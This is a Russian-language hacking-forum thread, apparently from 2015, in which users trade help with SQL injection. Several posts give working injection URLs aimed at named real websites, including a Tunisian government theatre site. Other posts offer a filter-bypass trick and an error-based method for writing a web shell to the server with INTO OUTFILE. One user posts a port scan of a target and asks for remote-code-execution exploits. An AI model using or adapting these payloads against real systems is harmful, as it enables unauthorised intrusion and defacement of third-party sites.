ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.05.2015, 11:51
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от kacergei
kacergei said:
↑
а как заставить sqlmap пробить? боюсь, что никак. у вас там не много запросов получится, если выводить с group_concat()
|
|
|
10.05.2015, 01:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от vikler
vikler said:
↑
Есть сайт MsSQLi. В общем, при раскрутке уязвимого параметра получаем редирект на другую страницу, где в url'е имеем: ".../ErrorHandling/FriendlyError.html?message=..."
В message="..." имеем стандартную MsSQL инъекцию (стандартный вывод ошибки)
В общем:
Код:
Code:
http://www.heritage{GOOGLE}-images.com/Search/SearchPage.aspx?searchterm=1970s&lictype=all&searchtype=KEY&orientation=YYYY&color=ALL&rmCollections=(Select%20top%201%20table_name%20from%20information_schema.tables)
Но получается нет таблицы для юзеров что ли? Я вроде как все просмотрела таблицы. ххмммм. Я что не так поняла м.б.? если посмотрела все таблицы этой бд и не нашла то наверно ее просто нет, если есть другие бд посмотри их
|
|
|
|
10.05.2015, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Код HTML:
HTML:
http://www.theatremunicipal-tunis.gov.tn/fiche_spectacle.php?id=53
Полей вроде 6-ть, а дальше чей-то ни как... |
|
|
|
10.05.2015, 23:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от frank
frank said:
↑
Код HTML:
HTML:
http://www.theatremunicipal-tunis.gov.tn/fiche_spectacle.php?id=53
Полей вроде 6-ть, а дальше чей-то ни как...
Код:
Code:
http://www.theatremunicipal-tunis.gov.tn/fiche_spectacle.php?id=54 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
|
|
|
|
11.05.2015, 13:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
5548
Репутация:
0
|
|
Есть сайт где в случае использование union, либо select в sqli вылезает 403 ошибка.
Иногда помогает замена на /*!uNIoN*/+/*!SElECT*/
Вопрос такой: если работает указанная конструкция на некотором сайте - будет ли работать она там же где работает обычный union select? |
|
|
|
11.05.2015, 13:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от sunnyfruit
sunnyfruit said:
↑
Есть сайт где в случае использование union, либо select в sqli вылезает 403 ошибка.
Иногда помогает замена на
/*!uNIoN*/+/*!SElECT*/
Вопрос такой: если работает указанная конструкция на некотором сайте - будет ли работать она там же где работает обычный union select? да. это синтаксис mysql
|
|
|
|
11.05.2015, 14:08
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Посоветуйте эксплойты для удаленного выполнения, а то пробыю и под Apache и ProFTPD ничего не выходит((
Код:
Code:
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3
80/tcp open http Apache httpd 2.2.15 ((Mandriva Linux/PREFORK-3mdv2010.1))
2222/tcp open ssh OpenSSH 5.5 (protocol 2.0)
Service Info: OS: Unix
И попутно какие есть уязвимости в yii frameworke 1.1.13? |
|
|
|
11.05.2015, 19:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
5548
Репутация:
0
|
|
Реально ли залить шелл через sqli file_priv = y, если она имеет тип error_based, либо blind. имеется ввиду не приводя инъекцию к обычному union виду
|
|
|
|
11.05.2015, 19:59
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от sunnyfruit
sunnyfruit said:
↑
Реально ли залить шелл через sqli file_priv = y, если она имеет тип error_based, либо blind. имеется ввиду не приводя инъекцию к обычному union виду Для Error-Based есть такой вектор:
Сообщение от None
select username from users where username=1 or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ""),floor(rand(0)*2)))
Для Union Based заливаете как есть, несмотря на отсутствие вывода. Проверяете залился ли файл командами
select if(load_file('/tmp/shell.php') is not null,1,2)=1 TRUE Файл существут
select if(load_file('/tmp/shell.php') is not null,1,2)=1 FALSE Файла нет
|
|
|
|
11.05.2015, 20:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
5548
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
↑
Для Error-Based есть такой вектор:
Для Union Based заливаете как есть, несмотря на отсутствие вывода. Проверяете залился ли файл командами
select if(load_file('/tmp/shell.php') is not null,1,2)=1 TRUE Файл существут
select if(load_file('/tmp/shell.php') is not null,1,2)=1 FALSE Файла нет Создал на Денвере таблицу users где есть id и username
Пишет ошибку:
Сообщение от None
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/usr/home/www/test.php' lines terminated by ""),floo' at line 1
Сам запрос:
Сообщение от None
select username from users where id>0 or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ''),floor(rand(0)*2)))
Где почитать можно подробнее?
Mysql символ " не совсем хорошо понимает!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
